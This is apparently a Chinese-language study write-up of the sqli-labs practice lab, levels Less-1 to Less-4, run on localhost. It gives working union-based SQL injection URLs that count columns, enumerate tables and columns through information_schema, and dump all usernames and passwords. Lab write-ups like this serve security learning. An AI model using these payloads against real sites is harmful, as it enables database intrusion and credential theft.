漏洞学习

sqlilabs Less-1~Less-4 writeup

文章目录
  1. 1. Less-1
  2. 2. Less-2
  3. 3. Less-3
  4. 4. Less-4

开始系统学习注入!

Less-1


根据提示对id这个参数进行测试,

1
http://localhost/sqli-labs-master/Less-1/?id=1'

页面报错

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

注意到LIMIT0,1后面多了一个’,所以构造下面语句来猜测列数

1
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3%23

测试到第四列的时候显示Unknown column ‘4’ in ‘order clause’,所以只有三列,然后显列

1
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3%23

显示的列数在2,3两列,所以测试数据库

1
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3%23

数据库名为security,对数据库名进行hex编码7365637572697479,爆表

1
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23

爆出表名为:emails,referers,uagents,users,下面开始爆列,这里使用users表,进行hex编码:7573657273

1
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273%23

OK,这里列名出来了:id,username,password,现在取数据

1
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username,0x3a,password),3 from users%23

这样就能获取所有的账号和密码。

Less-2


测试sql,加上单引号,测试成功,开始注入,测试列数

1
http://localhost/sqli-labs-master/Less-2/?id=1 order by 3%23

同上,只有三列,下面开始显列

1
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3%23

列数爆出来是2,3,现在查数据库

1
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,database(),3%23

emmmm数据库查出来还是security,所以下面操作同上,爆表爆列拿数据。

1
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username,0x3a,password),3 from users%23

OK,拿到所有账号密码。

Less-3


首先,还是进行sql注入测试,先上单引号,不过这次有点有趣,它报错报的是

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

所以这次是括号闭合加单引号闭合,测试列数如下

1
http://localhost/sqli-labs-master/Less-3/?id=1') order by 3%23

找到拼接字符以后就和Less-1步骤一样,最后拿到所有数据的payload

1
http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username,0x3a,password),3 from users%23

Less-4


这一波测试发现加上单引号以后页面显示正常,但是加上双引号以后有一个报错信息

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

所以进行绕过为”),测试列数正确,OK,继续重复Less-1过程…

1
http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username,0x3a,password),3 from users%23